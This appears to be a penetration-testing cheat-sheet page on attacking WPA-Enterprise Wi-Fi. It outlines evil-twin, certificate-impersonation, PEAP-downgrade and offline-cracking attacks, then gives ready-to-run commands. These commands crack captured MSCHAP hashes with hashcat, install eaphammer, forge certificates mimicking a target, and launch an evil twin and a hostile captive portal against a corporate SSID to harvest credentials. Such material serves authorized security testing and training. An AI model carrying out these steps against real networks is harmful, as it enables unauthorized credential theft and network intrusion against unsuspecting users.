WPA-Enterprise Attacks

Exploitation

WPA-Enterprise uses 802.1X authentication (RADIUS). Common EAP types include PEAP, EAP-TLS, and EAP-TTLS. Attacks focus on capturing EAP credentials or downgrading authentication methods.

Attack Vectors

Evil Twin with hostapd-wpe: Captures MSCHAP credentials when clients connect to a fake AP.
Certificate Impersonation: Many clients don't properly validate server certs. hostapd-wpe generates self-signed certs.
PEAP Downgrade: Force clients to use less secure authentication.
Offline Dictionary Attack: Captured EAP-MSCHAPv2 can be cracked offline.

Cracking MSCHAP Hashes

Crack captured MSCHAP hashes (Format: username::::response:challenge) using Hashcat mode 5500.

01-crack-mschap.sh

bash

hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt

Using Eaphammer

Eaphammer is a powerful tool for WPA-Enterprise attacks. First, install it.

02-install-eaphammer.sh

bash

git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer
./kali-setup

Generate certificates mimicking the target.

03-generate-certs.sh

bash

./eaphammer --cert-wizard

Launch an evil twin attack to capture credentials.

04-launch-evil-twin.sh

bash

./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds

Launch with a hostile portal to capture more credentials.

05-captive-portal.sh

bash

./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --captive-portal

WPA-Enterprise Attacks

Attack Vectors

Cracking MSCHAP Hashes

Using Eaphammer

Related Topics

Wireless Pentesting

Deauth Attacks

Authentication Cheatsheet